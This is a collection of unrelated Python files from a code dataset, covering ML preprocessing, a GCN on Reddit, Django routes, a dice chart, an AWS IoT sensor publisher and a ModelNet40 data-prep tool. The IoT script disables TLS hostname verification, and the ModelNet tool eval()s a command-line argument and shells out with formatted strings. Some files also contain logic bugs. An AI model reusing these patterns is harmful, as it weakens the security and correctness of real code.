+{"seq_id":"142139103","text":"import requests # https://pypi.python.org/pypi/requests/2.5.3\n # you don't need to be root to install this,\n # instead you can do a local install\nimport json # should be pre-installed with python\nfrom time import sleep,gmtime,strftime #python stdlib\nfrom subprocess import Popen #python stdlib\nfrom xsr_tools import *\n\n# -----------------------------------------------------------------------------\n\nblacklist = ['absradio',\n#\t 'binaergewitter',\n# 'dirtyminutesleft',\t\t\n#\t 'einschlafen',\n#\t 'fanboys',\n\t 'jobscast',\n\t 'macintalk',\n\t 'medienwelten',\n\t 'netzgespraeche',\n\t 'osm',\n#\t 'pandroid',\n#\t 'phasentheater',\n#\t 'quasselstrippen',\n 'reliveradio',\t\n#\t 'retinacast',\n#\t 'robotiklabor',\n#\t 'sundaymoaning',\n\t 'teezeit']\n#blacklist = []\n\nMO = MessageObj(filename=\"testlog.txt\")\n# MO = MessageObj() # <--- use this if you do not want a log file (empty brackets)\n\n# -----------------------------------------------------------------------------\n\ndef live_loop(blacklist, MO):\n MO.woof( \"%s ... waiting for streams ... \"%timestring())\n olddict = {}\n processlist = []\n while 1:\n httpsuccess, feedobj = xenim_request()\n if httpsuccess:\n newdict = parse_streaminfos_from_json(feedobj )\n olddict,processlist = oldnewcheckloop(blacklist,\n newdict,\n olddict,\n processlist,\n\t\t\t\t\t\t MO)\n else:\n MO.woof(\"%s HTTP error, let's act as if nothing happened ...\"%(timestring()))\n sleep(30) # seconds, don't set to low and ddos xenim!\n\nlive_loop(blacklist,MO)\n\n \n","sub_path":"xstreamrecorder.py","file_name":"xstreamrecorder.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"233289639","text":"import tensorflow as tf\nfrom preprocessing import tf_image\nfrom preprocessing import preprocessing_rfcn as pr\n\n\n\ndef preproces_for_train(image, labels, bboxes, input_shape, crop_shape, out_shape):\n image, labels, bboxes = local_preprocess_for_train(image, labels, bboxes, input_shape, crop_shape, out_shape)\n return image, labels, bboxes\n\ndef preprocess_for_eval(image,out_shape):\n img = tf.image.convert_image_dtype(image, tf.float32)\n img = tf_image.resize_image(img, out_shape,\n method=tf.image.ResizeMethod.BILINEAR,\n align_corners=False)\n img = resnet_norm(img)\n return img\n\ndef resnet_norm(img, mean=(0.485, 0.456, 0.406),std=(0.229, 0.224, 0.225)):\n mean_tensor = tf.constant(mean, tf.float32)\n std_tensor = tf.constant(std, tf.float32)\n ret_img = tf.div(img - mean_tensor, std_tensor)\n return ret_img\n\ndef resnet_denorm(img, mean=(0.485, 0.456, 0.406),std=(0.229, 0.224, 0.225)):\n mean_tensor = tf.constant(mean, tf.float32)\n std_tensor = tf.constant(std, tf.float32)\n ret_img = img * std_tensor + mean_tensor\n return ret_img\n\n\ndef vgg_norm(img):\n _R_MEAN = 123.68\n _G_MEAN = 116.78\n _B_MEAN = 103.94\n _NUM_CHANNELS = 3\n means = (_R_MEAN, _G_MEAN, _B_MEAN)\n channels = tf.split(axis=2, num_or_size_splits=_NUM_CHANNELS, value=img)\n for i in range(_NUM_CHANNELS):\n channels[i] -= means[i]\n return tf.concat(axis=2, values=channels)\n\n\ndef local_preprocess_for_train(image, labels, bboxes, input_shape, crop_shape,\n out_shape, data_format='NHWC',\n scope='rfcn_preprocessing_train'):\n\n fast_mode = False\n with tf.name_scope(scope, 'rfcn_preprocessing_train', [image, labels, bboxes]):\n if image.get_shape().ndims != 3:\n raise ValueError('Input must be of size [height, width, C>0]')\n # Convert to float scaled [0, 1].\n if image.dtype != tf.float32:\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n\n dst_image, dst_labels, dst_bboxes = pr.random_crop(image, labels, bboxes, img_shape=input_shape, crop_shape=crop_shape, keep_ratio=0.7, random_scale=(0.7, 1.3))\n\n dst_image = tf.image.resize(dst_image, (out_shape[0], out_shape[1]))\n\n dst_image, dst_bboxes = tf_image.random_flip_left_right(dst_image, dst_bboxes)\n\n #dst_image = pr.apply_with_random_selector(dst_image,lambda x, ordering: pr.distort_color(x, ordering, fast_mode),num_cases=4)\n\n dst_image = pr.resnet_norm(dst_image)\n\n if data_format == 'NCHW':\n dst_image = tf.transpose(image, perm=(2, 0, 1))\n return dst_image , dst_labels, dst_bboxes\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"bin/citypersons/cp_preprocess.py","file_name":"cp_preprocess.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"126879016","text":"import os.path as osp\r\nimport pandas as pd\r\nimport pickle as pkl\r\nimport numpy as np\r\nimport torch\r\ndevice = torch.device(\"cuda:4\")\r\ndata_root = '/home/kevinwm99/MOT/mot_neural_solver/data/MOT17Labels/train/MOT17-02-DPM/gt/gt.txt'\r\nseq_path = '/home/kevinwm99/MOT/mot_neural_solver/data/MOT17Labels/train/MOT17-02-DPM'\r\nGT_COL_NAMES = ('frame', 'id', 'bb_left', 'bb_top', 'bb_width', 'bb_height', 'conf', 'label', 'vis')\r\n# short-term dataset\r\nif __name__ == \"__main__\":\r\n det_df = pd.read_csv(data_root)\r\n det_df = det_df[det_df.columns[:len(GT_COL_NAMES)]]\r\n det_df.columns = GT_COL_NAMES\r\n\r\n det_df['bb_left'] -= 1 # Coordinates are 1 based\r\n det_df['bb_top'] -= 1\r\n\r\n # VERY IMPORTANT: Filter out non Target Classes (e.g. vehicles, occluderst, etc.) (see: https://arxiv.org/abs/1603.00831)\r\n det_df = det_df[det_df['label'].isin([1, 2])].copy()\r\n\r\n det_df['frame_path'] = det_df['frame'].apply(lambda frame_num: osp.join(seq_path[:-3], f'img1/{frame_num:06}.jpg'))\r\n frame_num = (torch.from_numpy(det_df.frame.values)).to(device)\r\n detection_id = torch.from_numpy(det_df.id.values)\r\n frame_num =frame_num.to(device)\r\n unique_ids = (det_df.id.unique())\r\n\r\n max_frame_dist = 5\r\n edge_ixs = []\r\n len_prev_object = 0\r\n for id_ in unique_ids:\r\n frame_idx = torch.where(detection_id == id_)[0]+1\r\n changepoints = torch.where(frame_idx[1:] != frame_idx[:-1])[0] + 1\r\n changepoints = torch.cat((changepoints, torch.as_tensor([frame_idx.shape[0]]).to(changepoints.device)))\r\n all_det_ixs = torch.arange(frame_idx.shape[0], device=frame_idx.device)\r\n for start_frame_ix, end_frame_ix in zip(changepoints[:-1], changepoints[1:]):\r\n curr_frame_ixs = all_det_ixs[start_frame_ix: end_frame_ix]\r\n curr_frame_num = frame_idx[curr_frame_ixs[0]]\r\n curr_frame_id = detection_id[curr_frame_ixs[0]]\r\n past_frames_ixs = torch.where(torch.abs(frame_idx[:start_frame_ix] - curr_frame_num) <= max_frame_dist)[0]\r\n\r\n edge_ixs.append(torch.cartesian_prod(past_frames_ixs+len_prev_object, curr_frame_ixs+len_prev_object))\r\n len_prev_object +=len(frame_idx)\r\n #\r\n edge_ixs = torch.cat(edge_ixs).T\r\n\r\n print(\"source: {}\".format(edge_ixs[0][:400]))\r\n print(\"destination: {}\".format(edge_ixs[1][:400]))\r\n","sub_path":"base/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"377950227","text":"#!/home/inje/anaconda3/envs/GNN_test/bin/python\nfrom torch_geometric.datasets import Reddit\nimport torch_geometric.transforms as T\ncoradata = Reddit(root='/tmp/Reddit', transform=T.NormalizeFeatures())\ndata = coradata[0]\nprint(data.is_undirected(), \"train=\", data.train_mask.sum().item(), \"val=\", data.val_mask.sum().item(),\"test=\", data.test_mask.sum().item())\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\nfrom typing import Optional, Tuple\nfrom torch_geometric.typing import Adj, OptTensor, PairTensor\nfrom torch import Tensor\nfrom torch.nn import Parameter\nfrom torch_scatter import scatter_add\nfrom torch_sparse import SparseTensor, matmul, fill_diag, sum, mul\nfrom torch_geometric.nn.conv import MessagePassing\nfrom torch_geometric.utils import add_remaining_self_loops\nfrom torch_geometric.utils.num_nodes import maybe_num_nodes\n\nfrom torch_geometric.nn.inits import glorot, zeros\ntorch.cuda.empty_cache()\n\nEVAL = 0\n@torch.jit._overload\ndef gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,\n add_self_loops=True, dtype=None):\n # type: (Tensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> PairTensor # noqa\n pass\n\n\n@torch.jit._overload\ndef gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,\n add_self_loops=True, dtype=None):\n # type: (SparseTensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> SparseTensor # noqa\n pass\n\n\ndef gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,\n add_self_loops=True, dtype=None):\n\n fill_value = 2. if improved else 1.\n\n if isinstance(edge_index, SparseTensor):\n adj_t = edge_index\n if not adj_t.has_value():\n adj_t = adj_t.fill_value(1., dtype=dtype)\n if add_self_loops:\n adj_t = fill_diag(adj_t, fill_value)\n deg = sum(adj_t, dim=1)\n deg_inv_sqrt = deg.pow_(-0.5)\n deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0.)\n adj_t = mul(adj_t, deg_inv_sqrt.view(-1, 1))\n adj_t = mul(adj_t, deg_inv_sqrt.view(1, -1))\n return adj_t\n\n else:\n num_nodes = maybe_num_nodes(edge_index, num_nodes)\n\n if edge_weight is None:\n edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,\n device=edge_index.device)\n\n if add_self_loops:\n edge_index, tmp_edge_weight = add_remaining_self_loops(\n edge_index, edge_weight, fill_value, num_nodes)\n assert tmp_edge_weight is not None\n edge_weight = tmp_edge_weight\n\n row, col = edge_index[0], edge_index[1]\n deg = scatter_add(edge_weight, col, dim=0, dim_size=num_nodes)\n deg_inv_sqrt = deg.pow_(-0.5)\n deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0)\n return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]\n\n\nclass Myconv(GCNConv):\n _cached_edge_index: Optional[Tuple[Tensor, Tensor]]\n _cached_adj_t: Optional[SparseTensor]\n\n def __init__(self, in_channels: int, out_channels: int,\n improved: bool = False, cached: bool = False,\n add_self_loops: bool = True, normalize: bool = True,\n bias: bool = True, **kwargs):\n\n kwargs.setdefault('aggr', 'add')\n super(GCNConv, self).__init__(**kwargs)\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.improved = improved\n self.cached = cached\n self.add_self_loops = add_self_loops\n self.normalize = normalize\n\n self._cached_edge_index = None\n self._cached_adj_t = None\n\n self.weight = Parameter(torch.Tensor(in_channels, out_channels))\n\n if bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n 
self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n glorot(self.weight)\n zeros(self.bias)\n self._cached_edge_index = None\n self._cached_adj_t = None\n\n def forward(self, x: Tensor, edge_index: Adj,\n edge_weight: OptTensor = None) -> Tensor:\n \"\"\"\"\"\"\n\n if self.normalize:\n if isinstance(edge_index, Tensor):\n cache = self._cached_edge_index\n if cache is None:\n edge_index, edge_weight = gcn_norm( # yapf: disable\n edge_index, edge_weight, x.size(self.node_dim),\n self.improved, self.add_self_loops, dtype=x.dtype)\n if self.cached:\n self._cached_edge_index = (edge_index, edge_weight)\n else:\n edge_index, edge_weight = cache[0], cache[1]\n\n elif isinstance(edge_index, SparseTensor):\n cache = self._cached_adj_t\n if cache is None:\n edge_index = gcn_norm( # yapf: disable\n edge_index, edge_weight, x.size(self.node_dim),\n self.improved, self.add_self_loops, dtype=x.dtype)\n if self.cached:\n self._cached_adj_t = edge_index\n else:\n edge_index = cache\n global EVAL\n\n x = torch.matmul(x, self.weight)\n out = self.propagate(edge_index, x=x, edge_weight=edge_weight,\n size=None)\n\n\n if self.bias is not None:\n out += self.bias\n\n return out\n\n def message(self, x_j: Tensor, edge_weight: OptTensor) -> Tensor:\n if edge_weight is None:\n return x_j\n else:\n return edge_weight.view(-1, 1) * x_j\n\n def message_and_aggregate(self, adj_t: SparseTensor, x: Tensor) -> Tensor:\n return matmul(adj_t, x, reduce=self.aggr)\n\n def __repr__(self):\n return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,\n self.out_channels)\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = Myconv(coradata.num_node_features, 16, cached=True,\n normalize=not False)\n # print('conv1:', self.conv1.weight.shape)\n # conv1: torch.Size([1433, 16])\n self.conv2 = Myconv(16, coradata.num_classes, cached=True,\n normalize=not False)\n # print('conv2:',self.conv2.weight.shape)\n # conv2: torch.Size([16, 7])\n\n def forward(self, data):\n x, edge_index, edge_weight = data.x, data.edge_index, data.edge_attr\n # print('x:',x.shape, 'edge:',edge_index.shape)\n # x: torch.Size([2708, 1433]) edge: torch.Size([2, 10556])\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = F.dropout(x, training=self.training)\n x = self.conv2(x, edge_index)\n\n return F.log_softmax(x, dim=1)\n# pyprof.wrap(Net, 'forward')\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nimport torch.autograd.profiler as profiler\nmodel = Net().to(device)\ndata = coradata[0].to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=5e-4)\n# print(data)\nmodel.train()\nfor epoch in range(200):\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask])\n loss.backward()\n optimizer.step()\n\n\nmodel.eval()\nEVAL = 1\n# with cpu profiler\n# with profiler.profile(record_shapes=True) as prof:\n# with profiler.record_function(\"model_inference\"):\n# model(data)\n#\n# prof.export_chrome_trace(\"trace.json\")\n\n\n# check for evaluation\ntorch.cuda.cudart().cudaProfilerStart()\n_, pred = model(data).max(dim=1)\ntorch.cuda.cudart().cudaProfilerStop()\ncorrect = int(pred[data.test_mask].eq(data.y[data.test_mask]).sum().item())\nacc = correct / int(data.test_mask.sum())\nprint('Accuracy: 
{:.4f}'.format(acc))","sub_path":"Graph/GCNwithReddit.py","file_name":"GCNwithReddit.py","file_ext":"py","file_size_in_byte":7937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
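The gcn_norm helper in the record above implements the symmetric normalization of Kipf & Welling, Â = D̃^{-1/2}(A + I)D̃^{-1/2}. A toy check on a two-node graph, assuming the record's gcn_norm is in scope:

```python
import torch

edge_index = torch.tensor([[0, 1], [1, 0]])  # one undirected edge, both directions
ei, ew = gcn_norm(edge_index, num_nodes=2)
print(ei)  # self-loops appended: tensor([[0, 1, 0, 1], [1, 0, 0, 1]])
print(ew)  # tensor([0.5, 0.5, 0.5, 0.5]): deg = 2 per node, so 1/sqrt(2) * 1/sqrt(2)
```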
+{"seq_id":"563426048","text":"from django.conf.urls import url\n\nfrom accounts.views import home_view\nfrom accounts.views import admin_view\nfrom accounts.views import appointment_view\nfrom accounts.views import profile_view\n\n\nurlpatterns = [\n url(r'^$', home_view.LoginView.as_view(), name='index'),\n url(r'^logout/$', home_view.LogoutView.as_view(), name='logout'),\n url(r'^register/$', home_view.RegistrationView.as_view(), name='register'),\n url(r'^setup/$', home_view.SetupView.as_view(), name='setup'),\n url(r'^error/denied/$', home_view.ErrorDeniedView.as_view(),\n name='error_denied'),\n\n url(r'^admin/users/$', admin_view.UsersView.as_view(), name='admin_users'),\n url(r'^admin/statistics/$', admin_view.StatisticsView.as_view(),\n name='admin_statistics'),\n url(r'^admin/statistics-by-doctors/$',\n admin_view.StatisticsByDoctorsView.as_view(),\n name='admin_statistics_by_doctors'),\n url(r'^admin/createemployee/$', admin_view.CreateEmployeeView.as_view(),\n name='admin_createemployee'),\n\n url(r'^appointment/list/$', appointment_view.ListView.as_view(),\n name='appointment_list'),\n url(r'^appointment/update/$', appointment_view.UpdateView.as_view(),\n name='appointment_update'),\n url(r'^appointment/create/$', appointment_view.CreateView.as_view(),\n name='appointment_create'),\n\n url(r'^profile/$', profile_view.ProfileView.as_view(), name='profile'),\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"267126138","text":"from plotly.graph_objs import Bar, Layout\nfrom plotly import offline\n\nfrom die import Die\n\ndie_1 = Die()\ndie_2 = Die()\n\nmax_roll = 12\nmin_roll = 2\n\nroll_number = 5000\n\nresults = []\nfrequencies = []\n\nfor i in range(roll_number):\n results.append(die_1.Roll() * die_2.Roll())\n\nfor value in range(6**2):\n frequencies.append(results.count(results[value]))\n\n# Visualize the data\n\nx_values = [x * y for x in range(1, die_1.sides +1 ) for y in range(1, die_2.sides + 1)]\ndata = [Bar(x=x_values, y=frequencies)]\n\nx_axis_config = {'title': 'Multiples of the 2 dice', 'dtick':1}\ny_axis_config = {'title': 'Frequencies of the multiples'}\n\n\ncustom_layout = Layout(title='Frequency of multiples of 2 D6', xaxis=x_axis_config,\n yaxis=y_axis_config)\n\noffline.plot({'data': data, 'layout': custom_layout}, filename='multiple_of_d6_dice.html')\n","sub_path":"Data visualization/Chapter 1/plotply/multiplication_dice.py","file_name":"multiplication_dice.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"234977061","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport paho.mqtt.client as mqtt\nimport json\nimport smbus\nimport ssl\nimport sys\nimport time\n\n\n# settings\ndeviceplace = 'room_27'\nroomname = 'room_27'\n\n# AWS IoT settings\n#host = 'a2j7b734sg66k1.iot.us-east-1.amazonaws.com' # AWS IoT Endpoint\nhost = 'a118dcs9px2ff8.iot.us-east-1.amazonaws.com'\nport = 8883 # port\ncacert = './cert/rootCA.pem' # root ca\nclientCert = './cert/certificate.pem.crt' # certificate\nclientKey = './cert/private.pem.key' # private key\ntopic = 'office/room/%s' % roomname # topic\n\n\n# Sensor settings\ni2c = smbus.SMBus(1)\nAM2320 = 0x5C\n\n\ndef on_connect(client, userdata, flags, respons_code):\n print('Connected')\n\n\ndef sensing():\n while True:\n #data = {}\n #data['temperature'] = get_temperature()\n #data['humidity'] = get_humidity()\n #data['index'] = (0.81 * data['temperature']) + (0.01 * data['humidity'] * (0.99 * data['temperature'] -14.3)) + 46.3\n data = get_data()\n publish(data)\n time.sleep(2)\n\ndef get_data():\n # wake sensor\n try:\n i2c.write_i2c_block_data(AM2320, 0x00, [])\n except Exception:\n pass\n time.sleep(0.001)\n\n # send read command\n i2c.write_i2c_block_data(AM2320, 0x03, [0x00, 0x04])\n time.sleep(0.015)\n\n # get data\n blockdata = i2c.read_i2c_block_data(AM2320, 0, 8)\n\n # get temperature\n temperature = float(blockdata[4] << 8 | blockdata[5])/10\n\n # get humidity\n humidity = float(blockdata[2] << 8 | blockdata[3])/10\n\n # calc index\n tempData = {}\n tempData['index'] = (0.81 * temperature) + (0.01 * humidity * (0.99 * temperature -14.3)) + 46.3\n tempData['temperature'] = temperature\n tempData['humidity'] = humidity\n\n return tempData\n\n\ndef get_temperature():\n # wake sensor\n try:\n i2c.write_i2c_block_data(AM2320, 0x00, [])\n except Exception:\n pass\n time.sleep(0.001)\n\n # send read command\n i2c.write_i2c_block_data(AM2320, 0x03, [0x00, 0x04])\n time.sleep(0.015)\n\n # get data\n blockdata = i2c.read_i2c_block_data(AM2320, 0, 8)\n\n # get temperature\n temperature = float(blockdata[4] << 8 | blockdata[5])/10\n return temperature\n\n\ndef get_humidity():\n # wake sensor\n try:\n i2c.write_i2c_block_data(AM2320, 0x00, [])\n except Exception:\n pass\n time.sleep(0.001)\n\n # send read command\n i2c.write_i2c_block_data(AM2320, 0x03, [0x00, 0x04])\n time.sleep(0.015)\n\n # get data\n blockdata = i2c.read_i2c_block_data(AM2320, 0, 8)\n\n # get temperature\n humidity = float(blockdata[2] << 8 | blockdata[3])/10\n return humidity\n\n\ndef publish(data):\n data['place'] = deviceplace\n print(data)\n client.publish(topic, json.dumps(data, ensure_ascii=False)) # publish\n\n\nif __name__ == '__main__':\n try:\n client = mqtt.Client(client_id=\"client_27\",protocol=mqtt.MQTTv311)\n\n # certifications\n client.tls_set(\n cacert,\n certfile=clientCert,\n keyfile=clientKey,\n tls_version=ssl.PROTOCOL_TLSv1_2)\n client.tls_insecure_set(True)\n\n # callback\n client.on_connect = on_connect\n\n # port, keepalive\n client.connect(host, port=port, keepalive=60)\n\n client.loop_start()\n\n sensing()\n except KeyboardInterrupt:\n sys.exit()\n","sub_path":"aws/room-pub2.py","file_name":"room-pub2.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"94978063","text":"import os\nimport math\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--run', type=str, required=True,\n help='The command to run.')\nparser.add_argument('--scanner', type=str, required=False,\n help='The path of the virtual_scanner')\nparser.add_argument('--simplify_points', type=str, required=False,\n default='simplify_points',\n help='The path of the simplify_points')\nparser.add_argument('--transform_points', type=str, required=False,\n default='transform_points',\n help='The path of the transform_points')\nparser.add_argument('--align_y', type=str, required=False, default='false',\n help='Align the points with y axis')\n\nabs_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nroot_folder = os.path.join(abs_path, 'data/ModelNet40')\n\nargs = parser.parse_args()\nvirtual_scanner = args.scanner\nsimplify = args.simplify_points\ntransform = args.transform_points\n\n\ndef download_m40():\n # download via wget\n if not os.path.exists(root_folder):\n os.makedirs(root_folder)\n url = 'http://modelnet.cs.princeton.edu/ModelNet40.zip'\n cmd = 'wget %s -O %s/ModelNet40.zip' % (url, root_folder)\n print(cmd)\n os.system(cmd)\n\n # unzip\n cmd = 'unzip %s/ModelNet40.zip -d %s' % (root_folder, root_folder)\n print(cmd)\n os.system(cmd)\n\n\ndef download_m40_points():\n # download via wget\n if not os.path.exists(root_folder):\n os.makedirs(root_folder)\n url = 'https://www.dropbox.com/s/m233s9eza3acj2a/ModelNet40.points.zip?dl=0'\n zip_file = os.path.join(root_folder, 'ModelNet40.points.zip')\n cmd = 'wget %s -O %s' % (url, zip_file)\n print(cmd)\n os.system(cmd)\n\n # unzip\n cmd = 'unzip %s -d %s/ModelNet40.points' % (zip_file, root_folder)\n print(cmd)\n os.system(cmd)\n\n\ndef clean_off_file(filename):\n # read the contents of the file\n with open(filename) as fid:\n file_str = fid.read()\n # fix the file\n if file_str[0:3] != 'OFF':\n print('Error: not an OFF file: ' + filename)\n elif file_str[0:4] != 'OFF\\n':\n print('Info: fix an OFF file: ' + filename)\n new_str = file_str[0:3] + '\\n' + file_str[3:]\n with open(filename, 'w') as f_rewrite:\n f_rewrite.write(new_str)\n\n\ndef get_filelist(root_folder, train=True, suffix='off', ratio=1.0):\n filelist, category = [], []\n folders = sorted(os.listdir(root_folder))\n assert(len(folders) == 40)\n for idx, folder in enumerate(folders):\n subfolder = 'train' if train else 'test'\n current_folder = os.path.join(root_folder, folder, subfolder)\n filenames = sorted(os.listdir(current_folder))\n filenames = [fname for fname in filenames if fname.endswith(suffix)]\n total_num = math.ceil(len(filenames) * ratio)\n for i in range(total_num):\n filelist.append(os.path.join(folder, subfolder, filenames[i]))\n category.append(idx)\n return filelist, category\n\n\ndef move_files(src_folder, des_folder, suffix):\n folders = os.listdir(src_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_src_folder = os.path.join(src_folder, folder, subfolder)\n curr_des_folder = os.path.join(des_folder, folder, subfolder)\n if not os.path.exists(curr_des_folder):\n os.makedirs(curr_des_folder)\n filenames = os.listdir(curr_src_folder)\n for filename in filenames:\n if filename.endswith(suffix):\n os.rename(os.path.join(curr_src_folder, filename),\n os.path.join(curr_des_folder, filename))\n\n\ndef convert_mesh_to_points():\n mesh_folder = os.path.join(root_folder, 'ModelNet40')\n # Delete the following 3 files since the virtualscanner can not deal with them\n 
filelist = ['cone/train/cone_0117.off',\n 'curtain/train/curtain_0066.off',\n 'car/train/car_0021.off.off']\n for filename in filelist:\n filename = os.path.join(mesh_folder, filename)\n if os.path.exists(filename):\n os.remove(filename)\n\n # clean the off files\n train_list, _ = get_filelist(mesh_folder, train=True, suffix='off')\n test_list, _ = get_filelist(mesh_folder, train=False, suffix='off')\n filelist = train_list + test_list\n for filename in filelist:\n clean_off_file(os.path.join(mesh_folder, filename))\n\n # run virtualscanner\n folders = os.listdir(mesh_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_folder = os.path.join(mesh_folder, folder, subfolder)\n cmd = '%s %s 14' % (virtual_scanner, curr_folder)\n print(cmd)\n os.system(cmd)\n\n # move points\n move_files(mesh_folder, mesh_folder + '.points', 'points')\n\n\ndef simplify_points(resolution=64):\n # rename and backup the original folders\n points_folder = os.path.join(root_folder, 'ModelNet40.points')\n original_folder = points_folder + \".dense\"\n if os.path.exists(points_folder):\n os.rename(points_folder, original_folder)\n\n folders = os.listdir(original_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_folder = os.path.join(original_folder, folder, subfolder)\n # write filelist to disk\n filenames = os.listdir(curr_folder)\n filelist_name = os.path.join(curr_folder, 'list.txt')\n with open(filelist_name, 'w') as fid:\n for filename in filenames:\n if filename.endswith('.points'):\n fid.write(os.path.join(curr_folder, filename) + '\\n')\n # run simplify_points\n output_path = os.path.join(points_folder, folder, subfolder)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n cmd = '%s --filenames %s --output_path %s --dim %d' % \\\n (simplify, filelist_name, output_path, resolution)\n print(cmd)\n os.system(cmd)\n os.remove(filelist_name)\n\n\ndef transform_points():\n points_folder = os.path.join(root_folder, 'ModelNet40.points')\n output_folder = os.path.join(root_folder, 'ModelNet40.points.y')\n folders = os.listdir(points_folder)\n for folder in folders:\n for subfolder in ['train', 'test']:\n curr_folder = os.path.join(points_folder, folder, subfolder)\n output_path = os.path.join(output_folder, folder, subfolder)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n # write filelist to disk\n filenames = os.listdir(curr_folder)\n filelist_name = os.path.join(curr_folder, 'list.txt')\n with open(filelist_name, 'w') as fid:\n for filename in filenames:\n if filename.endswith('.points'):\n fid.write(os.path.join(curr_folder, filename) + '\\n')\n\n # write the transformation matrix\n mat = '0 0 1 1 0 0 0 1 0'\n mat_name = os.path.join(curr_folder, 'mat.txt')\n with open(mat_name, 'w') as fid:\n fid.write(mat)\n\n # run transform points\n cmd = '%s --filenames %s --output_path %s --mat %s' % \\\n (transform, filelist_name, output_path, mat_name)\n print(cmd)\n os.system(cmd)\n os.remove(filelist_name)\n os.remove(mat_name)\n\n\ndef generate_points_filelist():\n points_folder = os.path.join(root_folder, 'ModelNet40.points')\n\n for folder in ['train', 'test']:\n train = folder == 'train'\n filelist, idx = get_filelist(points_folder, train=train, suffix='points')\n prefix = 'm40_' + folder\n filename = os.path.join(root_folder, '%s_points_list.txt' % prefix)\n print('Save to %s' % filename)\n with open(filename, 'w') as fid:\n for i in range(len(filelist)):\n fid.write('%s %d\\n' % (filelist[i], idx[i]))\n\n\ndef 
generate_points_filelist_ratios():\n ratios = [0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1.0]\n points_folder = os.path.join(root_folder, 'ModelNet40.points.y')\n\n for folder in ['train', 'test']:\n train = folder == 'train'\n for ratio in ratios:\n if train == False and ratio < 1:\n continue\n prefix = 'm40_y_%.02f_%s' % (ratio, folder)\n filename = os.path.join(root_folder, '%s_points_list.txt' % prefix)\n filelist, idx = get_filelist(points_folder, train=train,\n suffix='points', ratio=ratio)\n print('Save to %s' % filename)\n with open(filename, 'w') as fid:\n for i in range(len(filelist)):\n fid.write('%s %d\\n' % (filelist[i], idx[i]))\n\n\nif __name__ == '__main__':\n eval('%s()' % args.run)\n","sub_path":"pytorch/projects/tools/modelnet.py","file_name":"modelnet.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
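The ModelNet40 record above shells out through `os.system` on %-formatted strings and dispatches the `--run` argument via `eval('%s()' % args.run)`. A minimal sketch of the same step-dispatch pattern, with hypothetical placeholder step bodies, using a whitelist dict plus `subprocess.run` instead of `eval` and `os.system`:

```python
import argparse
import subprocess


def download_m40():
    # passing a list avoids shell quoting pitfalls; check=True raises
    # CalledProcessError instead of silently ignoring a failed download
    subprocess.run(['wget', 'http://modelnet.cs.princeton.edu/ModelNet40.zip',
                    '-O', 'ModelNet40.zip'], check=True)


def simplify_points():
    print('placeholder for the real simplification step')


# whitelist replacing eval('%s()' % args.run): only known steps can run
COMMANDS = {'download_m40': download_m40, 'simplify_points': simplify_points}

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--run', required=True, choices=sorted(COMMANDS))
    args = parser.parse_args()
    COMMANDS[args.run]()  # choices= guarantees the key exists
```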
